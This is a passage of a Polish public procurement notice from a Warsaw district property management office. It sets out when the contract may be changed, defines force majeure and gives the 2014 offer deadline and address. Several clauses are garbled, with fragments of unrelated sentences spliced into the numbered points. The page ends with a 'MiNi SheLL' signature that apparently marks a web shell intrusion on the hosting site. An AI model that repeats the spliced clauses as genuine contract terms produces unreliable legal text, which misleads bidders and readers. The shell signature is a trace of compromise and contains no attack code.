2)wystąpienia opóźnienia w uzyskaniu uzgodnień z jednostkami zewnętrznymi np. z dostawcą mediów albo organami administracji publicznej, co do których wydania właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres przewidziany w przepisach prawa, w którym ww. uzgodnienia powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność,
3. jest do pisemnego powiadomienia Zamawiającego. Do zawiadomienia muszą być do-łączone kopie uprawnień tego samego rodzaju i nie niemożności wykonywania prac z powodu braku dostępności do miejsc niezbędnych do ich wykonania z przyczyn niezawinionych przez Wykonawcę,
1)niemożności wykonywania prac, gdy obowiązujące przepisy nie dopuszczają do wykonania prac lub nakazują wstrzymanie prac z przyczyn niezawinionych przez Wykonawcę,
2)wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami.
3)uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia zaproponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego. 
4. Siła wyższa to zdarzenie, którego strony nie mogły przewidzieć, któremu nie mogły zapobiec ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wy-konanie w części lub w całości jego zobowiązań umownych, a w szczególności:
1)wojna, działania wojenne, terroryzm, rewolucja, przewrót wojskowy lub cywilny, rozruchy, akty wandalizmu
2)klęski żywiołowe, jak huragany, powodzie, trzęsienie ziemi, gradobicie;
3)bunty, niepokoje, strajki, okupacje budowy przez osoby inne niż pracownicy wykonawcy i jego podwykonawców.
5. Zmiany postanowień umowy strony mogą dokonać w drodze porozumienia w każdym czasie, w przypadku:
a)zmiany nazwy, NIP i Regonu Wykonawcy, jeżeli nie powoduje to zmiany Wykonawcy,
b)zmiany zakresu robót Podwykonawcy lub zgłoszenia udziału Podwykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zgnpragapld.waw.pl/strona/zamowienia-publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga-Południe m. st. Warszawy 
ul. Walewska 4 pok. 21, 04-022 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2014 godzina 11:00, miejsce: Zakład Gospodarowania Nieruchomościami w Dzielnicy Praga-Południe m. st. Warszawy 
ul. Walewska 4 pok. 1 (Kancelaria), 04-022 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com